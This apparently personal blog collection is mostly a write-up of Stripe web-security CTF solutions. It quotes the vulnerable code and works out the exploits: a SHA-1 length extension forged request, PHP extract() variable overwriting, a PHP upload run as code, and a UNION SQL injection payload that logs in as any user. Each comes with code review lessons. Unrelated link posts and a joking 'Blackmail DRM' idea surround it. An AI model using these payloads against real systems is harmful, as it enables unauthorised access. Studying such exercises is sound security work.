A DEFCON talk “The Secret Life of SIM Cards” that covers running apps on your SIM card. Surprisingly they run a subset of Java and execute semi-independent of the Phone’s OS.
Guardian - Secrets, lies and Snowden’s email: why I was forced to shut down Lavabit
"For the first time, the founder of an encrypted email startup that was supposed to insure privacy for all reveals how the FBI and the US legal system made sure we don’t have the right to much privacy in the first place"
Level 7 of the Stripe CTF involved running a length extension attack on the level 7 server's custom crypto code.
@app.route('/logs/')
@require_authentication
def logs(id):
rows = get_logs(id)
return render_template('logs.html', logs=rows)
...
def verify_signature(user_id, sig, raw_params):
# get secret token for user_id
try:
row = g.db.select_one('users', {'id': user_id})
except db.NotFound:
raise BadSignature('no such user_id')
secret = str(row['secret'])
h = hashlib.sha1()
h.update(secret + raw_params)
print 'computed signature', h.hexdigest(), 'for body', repr(raw_params)
if h.hexdigest() != sig:
raise BadSignature('signature does not match')
return True
The level 7 web app is a web API in which clients submit signed RESTful requests and some actions are restricted to particular clients. The goal is to view the response to one of the restricted actions. The first issue is that there is a logs path to display the previous requests for a user and although the logs path requires the client to be authenticatd, it doesn't restrict the logs you view to be for the user for which you are authenticated. So you can manually change the number in the '/logs/[#]' to '/logs/1' to view the logs for the user ID 1 who can make restricted requests. The level 7 web app can be exploited with replay attacks but you won't find in the logs any of the restricted requests we need to run for our goal. And we can't just modify the requests because they are signed.
However they are signed using their own custom signing code which can be exploited by a length extension attack. All Merkle–Damgård hash algorithms (which includes MD5, and SHA) have the property that if you hash data of the form (secret + data) where data is known and the length but not content of secret is known you can construct the hash for a new message (secret + data + padding + newdata) where newdata is whatever you like and padding is determined using newdata, data, and the length of secret. You can find a sha-padding.py script on VNSecurity blog that will tell you the new hash and padding per the above. With that I produced my new restricted request based on another user's previous request. The original request was the following.
count=10&lat=37.351&user_id=1&long=%2D119.827&waffle=eggo|sig:8dbd9dfa60ef3964b1ee0785a68760af8658048c
The new request with padding and my new content was the
following.
count=10&lat=37.351&user_id=1&long=%2D119.827&waffle=eggo%80%02%28&waffle=liege|sig:8dbd9dfa60ef3964b1ee0785a68760af8658048c
My new data in the new
request is able to overwrite the waffle parameter because their parser fills in a map without checking if the parameter existed previously.
Code review red flags included custom crypto looking code. However I am not a crypto expert and it was difficult for me to find the solution to this level.
Stripe's web security CTF's Level 1 and level 2 of the Stripe CTF had issues with missing input validation solutions described below.
$filename = 'secret-combination.txt';
extract($_GET);
if (isset($attempt)) {
$combination = trim(file_get_contents($filename));
if ($attempt === $combination) {
The issue here is the usage of the extract php method which extracts name value pairs from the map input parameter and creates corresponding local variables. However this code uses $_GET which contains a map of name value pairs passed in the query of the URI. The expected behavior is to get an attempt variable out, but since no input validation is done I can provide a filename variable and overwrite the value of $filename. Providing an empty string gives an empty string $combination which I can match with an empty string $attempt. So without knowing the combination I can get past the combination check.
Code review red flag in this case was the direct use of $_GET with no validation. Instead of using extract the developer could try to extract specifically the attempt variable manually without using extract.
$dest_dir = "uploads/";
$dest = $dest_dir . basename($_FILES["dispic"]["name"]);
$src = $_FILES["dispic"]["tmp_name"];
if (move_uploaded_file($src, $dest)) {
$_SESSION["dispic_url"] = $dest;
chmod($dest, 0644);
echo "Successfully uploaded your display picture.
";
}
This code accepts POST uploads of images but with no validation to ensure it is not an arbitrary file. And even though it uses chmod to ensure the file is not executable, things like PHP don't require a file to be executable in order to run them. Accordingly, one can upload a PHP script, then navigate to that script to run it. My PHP script dumped out the contents of the file we're interested in for this level:
Code review red flags include manual file management, chmod, and use of file and filename inputs without any kind of validation. If this code controlled the filename and ensured that the extension was one of a set of image extensions, this would solve this issue. Due to browser mime sniffing its additionally a good idea to serve a content-type that starts with "image/" for these uploads to ensure browsers treat these as images and not sniff for script or HTML.
Stripe's web security CTF's level 0 and level 3 had SQL injection solutions described below.
app.get('/*', function(req, res) {
var namespace = req.param('namespace');
if (namespace) {
var query = 'SELECT * FROM secrets WHERE key LIKE ? || ".%"';
db.all(query, namespace, function(err, secrets) {
There's no input validation on the namespace parameter and it is injected into the SQL query with no encoding applied. This means you can use the '%' character as the namespace which is the wildcard character matching all secrets.
Code review red flag was using strings to query the database. Additional levels made this harder to exploit by using an API with objects to construct a query rather than strings and by running a query that only returned a single row, only ran a single command, and didn't just dump out the results of the query to the caller.
@app.route('/login', methods=['POST'])
def login():
username = flask.request.form.get('username')
password = flask.request.form.get('password')
if not username:
return "Must provide username\n"
if not password:
return "Must provide password\n"
conn = sqlite3.connect(os.path.join(data_dir, 'users.db'))
cursor = conn.cursor()
query = """SELECT id, password_hash, salt FROM users
WHERE username = '{0}' LIMIT 1""".format(username)
cursor.execute(query)
res = cursor.fetchone()
if not res:
return "There's no such user {0}!\n".format(username)
user_id, password_hash, salt = res
calculated_hash = hashlib.sha256(password + salt)
if calculated_hash.hexdigest() != password_hash:
return "That's not the password for {0}!\n".format(username)
There's little input validation on username before it is used to constrcut a SQL query. There's no encoding applied when constructing the SQL query string which is used to, given a username, produce the hashed password and the associated salt. Accordingly one can make username a part of a SQL query command which ensures the original select returns nothing and provide a new SELECT via a UNION that returns some literal values for the hash and salt. For instance the following in blue is the query template and the red is the username injected SQL code:
SELECT id, password_hash, salt FROM users WHERE username = 'doesntexist' UNION SELECT id, ('5e884898da28047151d0e56f8dc6292773603d0d6aabbdd62a11ef721d1542d8') AS password_hash, ('word') AS salt FROM users WHERE username = 'bob' LIMIT 1
In the above I've supplied my own salt and hash such that my salt (word) plus my password (pass) hashed produce the hash I provided above. Accordingly, by
providing the above long and interesting looking username and password as 'pass' I can login as any user.
Code review red flag is again using strings to query the database. Although this level was made more difficult by using an API that returns only a single row and by using the execute method which only runs one command. I was forced to (as a SQL noob) learn the syntax of SELECT in order to figure out UNION and how to return my own literal values.
Jet Set Radio HD coming soon with awesome soundtrack promised. Exciting!
“From his first months in office, President Obamasecretly ordered increasingly sophisticated attacks on the computer systems that run Iran’s main nuclear enrichment facilities, significantly expanding America’s first sustained use of cyberweapons, according to participants in the program.”
Sarah and I have been enjoying Glitch for a while now. Reviews are usually positive although occasionally biting (but mostly accurate).
I enjoy Glitch as a game of exploration: exploring the game's lands with hidden and secret rooms, and exploring the games skills and game mechanics. The issue with my enjoyment coming from exploration is that after I've explored all streets and learned all skills I've got nothing left to do. But I've found that even after that I can have fun writing client side JavaScript against Glitch's web APIs making tools (I work on the Glitch Helperator) for use in Glitch. And on a semi-regular basis they add new features reviving my interest in the game itself.
Most existing DRM attempts to only allow the user to access the DRM'ed content with particular applications or with particular credentials so that if the file is shared it won't be useful to others. A better solution is to encode any of the user's horrible secrets into unique versions of the DRM'ed content so that the user won't want to share it. Entangle the users and the content provider's secrets together in one document and accordingly their interests. I call this Blackmail DRM. For an implementation it is important to point out that the user's horrible secret doesn't need to be verified as accurate, but merely verified as believable.
Apparently I need to get these blog posts written faster because only recently I read about Social DRM which is a light weight version of my idea but with a misleading name. Instead of horrible secrets, they say they'll use personal information like the user's name in the DRM'ed content. More of my thoughts stolen and before I even had a chance to think of it first!